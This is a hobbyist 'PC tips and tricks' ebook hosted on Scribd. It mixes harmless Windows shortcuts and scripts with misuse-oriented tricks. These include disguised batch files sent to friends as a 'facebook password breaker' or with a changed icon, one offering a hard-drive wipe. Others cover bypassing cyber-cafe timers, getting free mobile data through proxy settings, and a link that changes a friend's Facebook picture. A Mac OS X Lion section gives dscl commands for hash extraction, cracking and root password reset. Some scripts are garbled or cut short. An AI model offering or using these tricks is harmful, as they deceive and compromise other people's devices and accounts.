0% found this document useful (0 votes)
312 views

PC Tips and Trick Part-3

Khalid Chaudhary provides tips and tricks for PCs. The document includes a legal disclaimer noting readers are responsible for their own actions. It then introduces Khalid as an 18-year-old computer enthusiast who enjoys hacking, programming and more. The bulk of the document lists over 100 individual tips on topics like typing skills, Photoshop shortcuts, using Google Maps on cell phones, and more. Each tip is briefly described in a bullet point.

Uploaded by

Khan Niyaz
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
312 views

PC Tips and Trick Part-3

Khalid Chaudhary provides tips and tricks for PCs. The document includes a legal disclaimer noting readers are responsible for their own actions. It then introduces Khalid as an 18-year-old computer enthusiast who enjoys hacking, programming and more. The bulk of the document lists over 100 individual tips on topics like typing skills, Photoshop shortcuts, using Google Maps on cell phones, and more. Each tip is briefly described in a bullet point.

Uploaded by

Khan Niyaz
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 168

PC TIPS AND TRICK

BY: Khalid Chaudhari

Note: only for Educational purpose

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

LEGAL DISCLIMAR

Any proceedings and or activities related to the material contained


Within this volume are exclusively your liabilities. The misuse and
Mistreat of the information in this book can consequence in unlawful
Charges brought against the persons in question. The authors and
Review analyzers will not be held responsible in the event any unlawful
Charges brought against any individuals by misusing the information in
This book to break the law. This book contains material and resources
That can be potentially destructive or dangerous. If you do not fully
Comprehend something on this book, don‘t study this book. Please
Refer to the laws and acts of your state/region/ province/zone/territory
Or country before accessing, using, or in any other way utilizing these
Resources. These materials and resources are for educational and
Research purposes only. Do not attempt to violate the law with
Anything enclosed here within. If this is your intention, then leave now.
Neither writer of this book, review analyzers, the publisher, nor anyone
Else affiliated in any way, is going to admit any responsibility for your
Proceedings, actions or trials.

About The Author


BY: KHALID CHAUDHARY
PC TIPS AND TRICK

Khalid Chaudhary is an 18th year old computer geek.

Who likes to find vulnerabilities?


Doing Hacking, Programming, editing, cracking, web
Join Him on FB: Khalid Chaudhary
Pc Tips and Tricks
Greetz:
Pc Tips and Tricks
Designing, writing books, Animation and
more...........................
He Wants to Be a Software Designer and expert hacker..!!!!

Visit My Blog>>http://pctipstric.blogspot.in/

Join Him on FB: Khalid Chaudhary


Pc Tips and Tricks
Author:Khalid Chaudhary

 5 BEST WEBSITES TO LEARN FAST TYPING


BY: KHALID CHAUDHARY
PC TIPS AND TRICK

 25 People Who Changed the Internet Forever


 ADOBE PHOTOSHOP SHORTCUT KEYS
 Any cell phone that supports Google maps
 Best Hacking Operating System
 Block A Website in All Web Browsers...
 Clean Ur PC in One Click
 Creating virus is illegal but creating funny virus is not.
 Delete Shortcut Virus and Regain Lost Files.
 Disable Time limit in Cyber Cafe and use unlimited internet
 DISABLE USB PORT
 Hack your Friend's Android Phone Password
 Hard prank: Pick your poison batch file.
 How to access to free internet on airtel??
 Hidden Programs In Windows XP
 HOW DISABLE AUTO RUN
 HOW TO ACTIVATE SIM CARD INSTANTLY
 How to change friend's profile pictures
 HOW TO CHECK ALL MP3 SONGS IN COMPUTER!!!
 How To Create Fake Virus
 How to Create Your Own Proxy Server ?
 HOW TO DOWNLOAD YOUTUBE VIDEOS or ANY VIDEO IN
MOBILE EASILY WITHOUT SOFTWARE?
 How To Fix Windows Was Unable To Complete The Format
 How to Hack Mac OS X Lion Passwords!!!!
 How to hack windows password without knowing the older
password
 How to Hire an Email id only for 10 minutes
 How To Install More Than 1 OS On A Single Partition Using
VirtualBox

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 How to lock a folder


 How to Lock folder on windows using recycle bin-
 How to make a virus that disable mouse
 How To Make WiFi Hotspot Easily In Windows
 How to make your desktop icons Transparent
 How to reset trial period of your software
 how to Reveal Hidden Passwords (Asterisks) in Web Browsers-:
 HOW TO ROOT ANDROID PHONE
 How To Run Games Without Graphics Card
 HOW TO SCHEDULE AUTO SHUTDOWN IN WINDOWS 7
 How to Sniff Passwords Using USB Drive
 How To Speed Up Window 7 In 3 Simple Step
 How to unlock my memory card
 How to Use Color full alphabetical word on facebook
 How to use keyboard as mouse
 How to View Face book Private Profile Photo In Large Size?

 HOW TO WATCH YOUTUBE VIDEOS IN VLC MEDIA PLAYER

 INSTALL APPLICATION IN ANDROID BY PC


 Interesting Facts about Youtube
 INTERNET ERROR CODES!!
 This is very latest n interesting research about all 8 blood Group
 DIFFERENCE BETWEEN CORE I3, CORE I5, CORE I7
 8 semesters are there
 LIVE WALLPAPER ON YOUR DESKTOP
 Make ur Windows Genuine using notepad
 Make your Computer Welcome You

 Make your trial quick heal antivirus lifetime


 Creating A Shutdown Shortcut which cant be stop if Started
once, There is only one way to stop it
 How to watch Security Cameras on Internet
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

 Samsung Secret Codes !


 SHUTDOWN YOUR PC WITH A CELL PHONE
 Hack Friends ComPuter Using Pendrive (noob way)
 Speed up your internet by 20%
 Steps To Enable Hibernate Option in Windows 8.
 The top 20 places to find the world's fastest internet:

 This code is enough for crashing down any computer in

oops(c,c++,java ,python)?
 Common Errors in PC & There Solution

 Detail of all types processor


 Disco keyboard light
 Tips to recover scratched CD's
 Tips To Remove Software Properly From Your PC !!!

 OLD BUT AWESOME MAGIC

 How to Hide your .exe file in a .jpg

 TO INCREASE YOUR PC SPEED

 Did you know you can change the colour of cmd

 To Lock a folder in windows XP/7 without any software


 To Unlock the hidden themes on Windows7
 Top - 10 Programming language currently Used
 5 Hidden Features Of C++ That You May Find Interesting
 Top 10 tips to protect from hacker
 Trick to Make Wi-Fi Hotspot on Window using Notepad!!!
 Types Of Server
 Uninstall Program using Command Prompt in Windows
 Run Commands For windows xp

 Unlock Nokia Security Code


BY: KHALID CHAUDHARY
PC TIPS AND TRICK

 UPDATE YOUR STATUS IN BLUE COLOR:


 Use on-screen keyboard for secured typing.
 Infinite cycle of a messege
 VLC Media Player Keyboard Shortcuts
 VLC Media Player Keyboard Shortcuts 2
 Watch Live TV on Your PC For Free
 Website for driver
 What happens on the web in 30seconds!
 Hack Remote PC using Payload in BackTrack5
 Basic tips for Secure Browsing
 What if the I.T. industry starts producing movies
 List Of Computer and Internet Acronym’s
 Why #Hackers and Programmers choose Linux instead of
Windows and Mac?
 Windows calculator tips
 Windows keyboard shortcuts.....
 How to change your folders background
 Make a Private Folder with your password
 How To Rename Your Recycle Bin
 If you want to make your own program which speaks your text.
 Ноw tо Hide Drives with CMD

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

5 BEST WEBSITES TO LEARN FAST TYPING

1-> www.goodtyping.com
2-> www.10-fast-fingers.com
3-> www.typingweb.com
4-> www.typeracer.com
5-> www.typeonline.co.uk

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

25 People Who Changed the Internet Forever

1. Sir Tim Berners-Lee – World Wide Web


2. Vint Cerf And Bob Kahn – TCP/IP
3. Larry Page and Sergey Brin – Google Inc.
4. David Filo and Jerry Yang – Yahoo! Inc.
5. Bill Gates – Microsoft
6. Steven Paul Jobs – Apple Inc.
7. Mark Zuckerberg – Facebook
8. Chad Hurley and Steve Chen – YouTube
9. Linus Torvalds – Linux
10. Jack Dorsey – Twitter
11. Kevin Rose – Digg
12. Bram Cohen – BitTorrent
13. Mike Morhaime – Blizzard Entertainment
14. Jimmy Wales – Wikipedia
15. Jeff Preston Bezos – Amazon
16. Shawn Fanning – Napster, Rupture
17. Pierre Omidyar – eBay
18. Jack Ma – Alibaba
19. Craig Newmark – Craigslist
20. Matt Mullenweg – WordPress
21. Thomas Anderson – MySpace
22. Garrett Camp – StumbleUpon
23. Jon Postel – Internet Pioneer
24. Caterina Fake – Flickr
25. Marc Andreessen – Netscape

ADOBE PHOTOSHOP SHORTCUT KEYS

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

CTRL+N New Window


CTRL+O for open an image
CTRL+P for print out
CTRL+0 for fit on screen
CTRL+T for free transform
CTRL+U for color scheme
CTRL+Q for Quit adobe Photoshop
CTRL+= For zoom in
CTRL+- for zoom out
CTRL+ALT+0 for actual pixels
CTRL+L for level image
CTRL+M for curve
CTRL+V for paste
CTRL+C for copy
CTRL+A for select all
CTRL+D for deselect
CTRL+W for close the window
CTRL+SHIFT+S for save as the image
CTRL+ALT+Z for undo
CTRL+SHIFT+Z for Redo
CTRL+X for cut
CTRL+I invert colors
CTRL+B for color balance
CTRL+SHIFT+B for auto balance
CTRL+SHIFT+L for auto level
CTRL+SHIFT+U for desaturate
CTRL+SHIFT+E for merge layers
CTRL+J for duplicate layer
TAB for show & hide Toolbox, windows
F for change the screen view
CTRL+SHIFT+I for inverse selection
CTRL+SHIFT+W for close all opened windows

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Any cell phone that supports Google maps

• Google Latitude. Which you can download by going to google.com/latitude from


your cell phone.

STEPS:-
• Go to www.google.com/latitude from your cell phone.
• Download the free app.
• Open the App.
• Enter You mobile number in the entry Field.
• Now You've set it up on your phone. Now you gotta set it up on your friends cell
phone.

HOW TO SET IT UP ON YOUR FRIENDS CELL PHONE:

• You can add friends by their E-mail Addresses. Your friends will receive an E-
mail with the downloadlink of Google latitude.
• Or you can manually add yourself or ask your friend to add google latitude on
his/her cell phone.
• Now you and your friend can add each other as friends on google latitude and
you'll get the exact location of where your friends cell phone is.
• There is exactly no limit to how many friends you can add in your latitude circle.
( just make sure you dont add your parents :)
• Well so As soon as You and your buddy confirm each other as friends you get to
see each others location.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

HOW TO USE IT EVEN WHEN YOU DON'T HAVE YOUR CELL


PHONE WITHYOU:
• Well the most eye catching feature of google latitude is that you can
use it online even without a cell phone.
• Just go to google.com/latitude from you PC, Follow the instructions,
log-in into your account. And track You friends Locations !!

Best Hacking Operating System

1. kali Linux
2. BackTrack 5r3
3. NodeZero.
4. BackBox Linux
5. Blackbuntu.
6. Samurai Web Testing Framework.
7. Knoppix STD.
8. Pentoo.
9. WEAKERTH4N.
10. Matriux Krypton.
11. DEFT.
12. CAINE
13. Bugtraq

Block A Website in All Web Browsers...


This action will require you to edit your Host file. Your host file is a computer file
used to store information on where to find a node on a computer network. For
more a more detailed description. Check out this link Host File Description Link

In Windows

>Click Start->All Programs->Accessories->Command Prompt


>Click Command Prompt This will open a DOS command window.
>Type: notepad C:/Windows/System32/drivers/etc/hosts
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

>Locate the line 127.0.0.1 localhost


>To block the website google.com for example, just add this text under 127.0.0.1
localhost:

127.0.0.1 google.com
127.0.0.1 www.google.com

>You can add as many sites any site, However you will need to prefix it with
"127.0.0.1".
>Save the file .
Google will now be blocked in all web browser. This is an advanced but easy
method on how to block a website.

Clean Ur PC in One Click Using This File :-

open notepad nd copy the code given below-

@echo off
if %username% == Administrator.WINDOWS goto admin
REM ** Delete User Files **
rmdir /S/Q "%systemdrive%\Documents and
Settings\%username%\Recent"
rmdir /S/Q "%systemdrive%\Documents and
Settings\%username%\Local Settings\Temp"
rmdir /S/Q "%systemdrive%\Documents and
Settings\%username%\Local Settings\History\History.ie5"
rmdir /S/Q "%systemdrive%\Documents and
Settings\%username%\Local Settings\Temporary Internet
Files\content.ie5"
goto end
:admin
REM ** Do some extra stuff here **
REM ** What ever you want..... **
ECHO You are a Administrator

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

mdir /S/Q "%systemdrive%\Documents and


Settings\%username%\Recent"
rmdir /S/Q "%systemdrive%\Documents and
Settings\%username%\Local Settings\Temp"
rmdir /S/Q "%systemdrive%\Documents and
Settings\%username%\Local Settings\History\History.ie5"
rmdir /S/Q "%systemdrive%\Documents and
Settings\%username%\Local Settings\Temporary Internet
Files\content.ie5"
REM ** Do more stuff here **
REM ** Blah, blah, blah......**
:end
exit

Save It Is Cleaner.bat

Creating virus is illegal but creating funny virus is not.

Here I will show you how to make a funny virus to panic your friends.
In this tutorial I will show you how to make Facebook virus using simple
commands on notepad. .
This will make the victim think they have got a virus when they click on
an icon such as Internet Explorer.
1) Open notepad
2) Type this in :
@echo off msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES
YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE
VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE shutdown -r -t 300 -c ―SORRY!!! YOUR FACEBOOK ACCOUNT
ARE NOW BEING DELETED!!! PLEASE WAIT ..........."
3)Save as facebook password breaker .bat
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

5) Send it to your friends and say them it can break Facebook accounts
When He/She double click it a message will open and their computer
will restart. After five minutes windows will restart, that is all.
This is totally harmless and will give you a laugh.
NOTE: - The hack can be changed and use to make orkut virus or hi5.

Delete Shortcut Virus and Regain Lost Files.

Cause:- A virus most famous as "Shortcut Virus".

Step 1:- Inserting your affected Pen-Drive into computer.

Step 2:- Opening "Command Prompt" by Run Command.

Run command can be opened by pressing "Windows Logo Key + R" from your
keyboard. Once you opened "Run" type this code in it: "CMD" and press enter
button.

Step 3:- Typing the main code of shortcut virus in command prompt

After opening command prompt you have to write a code carefully in it. The code
is:

attrib –r –a –s –h /s /d (Drive Word):\*.*

You have to change in (Drive Word) as your drive latter you mentioned earlier.
Something look like this:

attrib –r –a –s –h /s /d E:\*.*

Here "E" is your drive latter, Change this latter exactly as it of your pen drive.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

After typing this code press enter in your keyboard.

Step 4:- Copping the main files or folders you lost.

After pressing enter button "Open Your Pen Drive" and you can see your lost files
and folders along with the shortcut files and folders.

Immediately Copy Your Real Files and Folders From Pen Drive Into Your
Computer.
After copying files and folders "Format" your pen drive.

So, That's It. Enjoy your virus free pen drive again.
No more today, I'll back with another post next.

You can see the video of "Shortcut Virus":-

Enjoy !!!!!!!

Disable Time limit in Cyber Cafe and use unlimited internet

Alright , Were Gonna Learn How To Disable


The Timer On The Computers On In Internet
Cafe's. Alright Create A New Text
Document,Than Type CMD In It, And Than
Save It As a Batch File, And Than Run The
New Batch File On Your Desktop.
Than Command Prompt Should Open, Now
You Type "cd\windows" to change the
directory to Windows, than type in "regedit"
to get to the registry editor gui, than
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

navigate to
"HKEY_CURRENT_USER>Appevents>s
oftware>classes>
microsoft>windows>current
version>internet
settings>policies>system" than on the right
pane where it says Disable Taskmanager,
right
clickon it, and scroll down to modify, and
than
change the value of it to "0", and than open
Windows Task Manager By Holding Down
These Keys, "CTRL+ALT+DEL/DELETE" And
Than DisableThe Internet Cafe's Timer, And
WoohLAH, UNLIMTED TIME

DISABLE USB PORT

Step 1:Goto run...


Step 2:Type 'regedit' without quotes...
Step 3:Click on HKEY_LOCAL_MACHINE...
Step 4:Go to SYSTEM...
Step 5:Click on CurrentControlSet...
Step 6:Click on services...
Step 7:Go to USBSTOR...
Step 8:Double click on 'Start' where value is 3...
Step 9:Now change the value data with 4...
Step 10:Now press ok and refresh your desktop your USB port is disabled, to
enable the usb port replace the value 4 with 3...

Hack your Friend's Android Phone Password


(By Resetting, you can use it, if you forgot your password) :

1. Power down your device. Before you begin the reset procedure, you will need

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

to completely power your device off. If it is frozen, you can pull the battery out to
turn it off.

2.Press and hold the recovery buttons. The buttons vary from device to device, so
you may need to look up the instructions for your particular phone. You will need
to press and hold the buttons for a few seconds. Some of the more common
button combinations include:

Volume Up + Home + Power


Volume Down + Power
Home + Power

3.Select Factory Reset. Once the recovery menu opens, you can navigate the
menu with the volume buttons. You may need to open the Recovery menu to find
the Factory Reset mode. Use the Power button to select your menu options.
You will be asked to confirm the factory reset.

4.Wait for the restore process to compete. After your phone resets, it will be set
back to factory defaults and will be like it just came out of the box.

Hard prank: Pick your poison batch file.


It asks your friend to choose a number between 1-5 and then does a certain
action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown

Type :

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has
the power to kill yourself. If you press 'x' then your PC will be formatted. Do not
come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your
friend, so right click the file, click Properties, click on the 'Change' Icon and change
the icon from there.

How to access to free internet on airtel??

This trick is mainly based on the Reverse ip trick but without using externel proxy
sites it direct fetch file by OM (Opera Mini) SERVER.
1.Open my given Opera MINI browser and when you get the download page there

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

will be two options save and open.


2.click save and select downlad .Now replace "global-4-lvs-seele.opera-mini.net"
with "wap.mauj.com" or "wap.indiatimes.com".Remove " "when you do the
input.
3.CLICK menu and select download.
4.If dwnld start then its fine otherwise after 2nd step just copy all the download
URL and exit OM4.2 Test7 rev airtel mod by me and open link with default
browser and ur download will stast with high speed.
Settings To Use Airtel Free GPRS:
Access Point: airtelgprs.com
Proxy IP: 80.239.242.253
Proxy Port: 80.
Now Lets Enjoy with Airtel Free GPRS.

Hidden Programs In Windows XP

1. Private Character Editor : Used for editing


fonts,etc. ** start>>Run ** Now, type eudcedit

2. Dr. Watson : This an inbuilt windows repairing


software ! ** start>>Run ** Now, type drwtsn32

3. Media Player 5.1 : Even if you upgrade your


Media Player, you can still access your old player in
case the new one fails !!! ** start>>Run ** Now,
type mplay32
.

HOW DISABLE AUTO RUN

1) Click Start, Run and enter GPEDIT.MSC

2) Go to Computer Configuration, Administrative Templates, System.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

3) Locate the entry for Turn autoplay off and modify it as you desire.

HOW TO ACTIVATE SIM CARD INSTANTLY


When u buy any new sim . The shopkeeper will tell u to wait few hours/days to
get the sim
activated. ..
when u purchase a new sim card u will get two or three papers in which you have
to fill the details.. .
check the page in which your mobile number is written. and near your number
you can see SR NUMBER.[serial number] . . .
you can also find SR. No. on sim card's slip on plastic cover.
IF YOU WANT INSTANT ACTIVATION THEN
INSERT SIM IN YOUR MOBILE AND DIAL THE SERIAL NUMBER TWO
TIMES.. . ..Thats all..your sim card'll be activated within one
minute.

How to change friend's profile pictures

STEP 1 : Login with your facebook account.

STEP 2 : Select the friend whose profile picture you want to change.

STEP 3 : Select any photo from


facebook , open it and in the url of photo add " &makeprofile=1 "
STEP 4 : Now send this url to the selected friend along with
&makeprofile=1 at the end.
That's it.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Done when your friend click the link he will be automatically redirected to
profile image cropping page , when your friend crops the image his profile picture
will be automatically changed .
Make sure that your friend crops the image.

HOW TO CHECK ALL MP3 SONGS IN COMPUTER!!!

Step 1:Just Type .mp3 in Search box of your pc...


Step 2:All The MP3 SONGs will come in front of you...
Step 3:You can also Check how many MP3 SONGS are there in your pc...

You can aslo check other files in your pc like software, games, wallpapers, videos
etc...
Here are some more extention for pc content...
e.g.
.exe = SOFWARES/GAMES
.jpg = WALLPAPER/IMAGES
.mp4 = VIDEO FILE
.avi = VIDEO FILE
.mkv = VIDEO FILE

So friends enjoy and wait for our next trick

How To Create Fake Virus

1.Open Notepad
2.Copy the below code and paste it in the notepad

@echo off

pathping localhost -q 2 -p 250 > nul


pathping localhost -q 2 -p 250 > nul

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

pathping localhost -q 2 -p 250 > nul


pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo It will now begin to delete your files.

pathping localhost -q 2 -p 250 > nul


pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo Do you want to abort the deletion of your files?
pause
echo Wow you really fell for that.AB made the CODE which will delete your
account.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo deleting…….
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo
3.Save the save with the name anything.bat

4.Run it and u will be scare of it send it to your friends to scare them.

How to Create Your Own Proxy Server ?

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Step 1 : Open appengine.google.com and login in with your google account.

Step 2 : Click the “Create an Application” button. If this is your first time then
Google may ask to verify code via sms to your mobile phone number.

Step 3: Select an Application Identifier and it will become the sub-domain of proxy
server. Give a title (say My Proxy Server) to your app, set the Authentication
Option “Open to all users”, create the application.

Step 4: Go to python.org, download the 2.7 Installer and install Python. If you are
using Mac, Python 2.7 is already installed on your computer.

Step 5: Download the application files required to create a proxy server from here
. Extract the zip file on your desktop. You may edit the "main.html" file , to
customize the front end of your proxy server.

Step 6: Go to code.google.com, download the "Google App Engine SDK for


Python" and install it. When the installation has finished, click “Run Launcher”
button.

Step 7: Inside the Google App Engine Launcher, Select Edit >> Preferences from
the desktop and set the correct values for the Python Path, App Engine SDK and
the Text Editor (set this is as WordPad or write.exe and not notepad.exe) as
shown in the screenshot below.
google+app+engine+preferences

Step 8: Click File tab >> Add Existing Application under the Google App Launcher
program and browse to the folder that contains the files that you extracted in
Step 5. Once the project is added to App Engine, select the project and click Edit
to replace “YOUR_APP_ID” with your App ID (Sub-Domain you created in Step 3).
Save and close the file.

Step 9: Hit Deploy, enter your Google account credentials and, within few
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

seconds, your online proxy server will be deployed. The public URL (or web
address) of your new proxy server will be your _app_id.appspot.com (replace
_app_id with your App Engine Identifier).

trickseekproxyserver(google+app+engine)

TAA DAA !! You have now successfully created your personalized proxy server in
just 9 steps

HOW TO DOWNLOAD YOUTUBE VIDEOS or ANY VIDEO IN MOBILE


EASILY WITHOUT SOFTWARE

THIS METHOD WORKS FOR COMPUTER AND


MOBILE BOTH !!!

Steps:
1.Play the video which you desire to
download
2.Go to the address bar and replace www.
with"ss"(without quotes).
3. THEN PRESS ENTER
4. You will see a new page for downloading
your video.
5. CLICK ON ANY FORMAT IN WHICH U
WANT TO DOWNLOAD YOUR VIDEO..

How To Fix Windows Was Unable To Complete The Format

Have You Recived Error Message During Format Any Removable Disk(PenDrive,
MemoryCard, Removable Disk ,Other USB Disk's) Then We Have A Proper 100%
Working Solution For You , Just Follow The Easy Steps . Read The Full Post

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Read The Following Method'S CareFully

1st Method :

1. Go to desktop and right click on my computer.


2. Select Manage from the menu.
3. Then goto disk management from the options.
4. After that select the flash drive from the clicked window.
5. And then format your flash drive with the option you got from there.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

2nd Method :

1. Login as an administrator powered user and go to "Command prompt".(Open CMD as


Administrator Rights)
2. Now type - format g: /q /fs:fat32 - and press Enter
If Your Flash Drive Letter G: . If not Then Just Change g: From There With Your Flash Drive
Letter.
3. If you want to format your pendrive then just replace fat32 with ntfs.Example : format g:
/q /fs:ntfsIf Your Flash Drive Letter G: . If not Then Just Change g: From There With Your
Flash Drive Letter.

3rd Method :

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

If Still It Didn't Format Then Use Some Format Software .......


1. SD Formatter CLiCk : Click Here To DOWNLOAD
2. Any Drive Formatter : Click Here TO DOWNLOAD

How to Hack Mac OS X Lion Passwords!!!!

On Sunday, September 19th, an exploit for the latest Mac OS X 10.7 "Lion" was
discovered by Patrick Dunstan. This exploit allows for an attacker, even remotely,
to request to have the root user's password changed without knowing the
password to the system
beforehand. This would lead to the legitimate owner of the system getting locked
out, as well as all of their files being compromised (unless disc encryption was in
place). Let's go over why this happens, and how to stop it until a patch comes out.
A Byte of Info
The way a Mac system stores its user passwords is similar to Linux, as they are
both built off of the Unix kernel.
A user creates an account, and then the encrypted hash of the user's password
file, their "Shadow" file, is saved in a
.plist file located in /var/db/dslocal/nodes/Default/users.
The normal way a user would crack this, is to obtain a users Generated User ID
(GID) and find it in the shadow file. This flaw is
averted by only allowing the root user to view the shadow file.
This still holds true in Lion. However, one major flaw was overlooked. Non- root
users cannot directly view hash data, but rather, they can extract it from Directory
Services.

Step 1 How to Extract the Hashes


Normally, to see profile information
about a user, you invoke this command
in a terminal:
$ dscl localhost -read /Local/Default/
Users/<root user>
To see hash data, we just invoke

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Directory Services using the /Search/


path like so:
$ dscl localhost -read /Search/Users/
<root user>
Now, in the terminal output you
should see a line in there that says:
dsAttrTypeNative:ShadowHashData:
Look at the bytes below it. Bytes 28-32
are the password salt (4 bytes are in
each octet), and bytes 32-96 are the
SHA512 hash. From there, the user
wanting privilege escalation can then
load the hash into a password cracker
for SHA512 hashes with 4 byte salts.
There is one made by the author of the
exploit here written in python
(brownie points for that, good sir).

Step 2
Copy > paste the code in a text
document and name it "hack.py".
Get a password list to run against the
file - you can find good ones at Packet
Storm.
In a terminal, change to the directory
"hack.py" is in and issue the command
with this syntax:
$ python hack.py <username> <path/
to/dictionary/file>
Wait until it completes and retrieves
your password.
What if it Can't Crack the Password?
That's simple, not only did Mac slip up
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

on being able to read password hashes,


any user can issue the "passwd"
command to change any user's
passwords. Feel safe still, Mac users?

Here's an example:

$ dscl localhost -passwd /Search/


Users/<root user>
You will then be prompted to enter a
new password for the user. There it is,
easier than denying your teenage
daughter a brand new car, a user can
change your password.
How Do I Keep Myself Safe from This?
Keep a REALLY long password, that
isn't in a dictionary (full ASCII jumbles
are preferred).
Never leave your computer
unattended, and do not enable remote
access. This is disabled by default, so
don't worry if you're unsure..

How to hack windows password without knowing the older passwrd

It is possible to change Adminstrator password both in Win XP and Vista without


knowing it. If you somehow manage to login as an Administrator then you can
change the password without knowing it.

Here’s the Step-By-Step instructions

1. Right-click on the “My Computer” icon on the desktop OR in the Start Menu.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

2. Select the option “Manage”.

3. On the left pane expand the “Computer Management (Local) tree (if it is not
already expanded)

4. Double click “Local Users and Groups” option From “System Tools” tree.

5. Click the “Users” option.

6. Now you will see the list of users on the right side pane, such as Administrator,
Guest etc.

7. Right click the “Administrator” and select the option “Set Password” option.

8. Now you will see a warning message, Click on proceed.

9. Now the system asks you for “New Password” and “Confirm Password” .

10. After entering the password click on “OK”. The password is changed. That’s
It!..

How to Hire an Email id only for 10 minutes

STEP 1.
Firstly open 10minutemail.com
Now an email will be generated
which will be valid till 10
minute on your ip address.
You can reply and receive
emails here.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

STEP 2.
Now use this trick to verify
your account and to
promotional bonus.
Now no danger of junk email in
your account.

How To Install More Than 1 OS On A Single Partition Using VirtualBox

You may be a Windows user, a Linux


user or you may be using some other
operating system. It may happen that
you want to try out any other OS or
you may be a developer using some
other OS.
In this case you have 2 primary options
to install the second OS on your
computer:
1. To install the second OS on a
different partition and use a multi-
partition system.
2. To install the second OS on the
same partition.
The first option of creating a separate
partition may create some issues in the
long run. Either that the two OS may
not be a well compatible one or your
hard drive may get corrupted more
easily due to viruses or other
vulnerabilities.
And that is why you might be

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

interested to know more about the


second alternative i.e. to install the
another OS on the same partition and
more specifically - on the same OS.
This is possible with - VirtualBox.
VirtualBox is a freeware software that
can emulate a virtual hard drive using
some space on your real hard drive on
some OS. The virtual hard drive on the
VirtualBox system can then be used as
a new computer itself and can be used
to install and use any other OS that
you can install on any normal hard
drive.

How to lock a folder

Its important to lock a folder to save our personal files... So we can lock a folder by the
following ways.
DON’T FORGOT TO KEEP THE PASSWORD IN THE CODE WHERE IT IS WRITTEN “TYPE YOUR
PASSWORD HERE”
STEP 1: copy the following code into notepad and save as “.bat”. for example we take it as :
“key.bat”

cls
@ECHO OFF
title Folder SARAT
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST SARAT goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

if %cho%==n goto END


if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren SARAT "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter the Password to unlock folder
set/p "pass=>"
if NOT %pass%== TYPE YOUR PASSWORD HERE goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" SARAT
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md SARAT
echo SARAT created successfully
goto End
:End

STEP 2: Now a batch file is formed. Now double click the batch file and a folder named SARAT
appears. Now save all your personal data in it.
STEP 3: Now to lock the folder just double-click on the file “Key”. You will get a confirmation
message in Command Prompt. Type “y” to confirm. Now the folder “SARAT” will be locked and
hidden
STEP 4: If you want to get access to the contents of the folder then again double-click on the
batch file, you have created. Immediately you will be prompted to enter your password. After
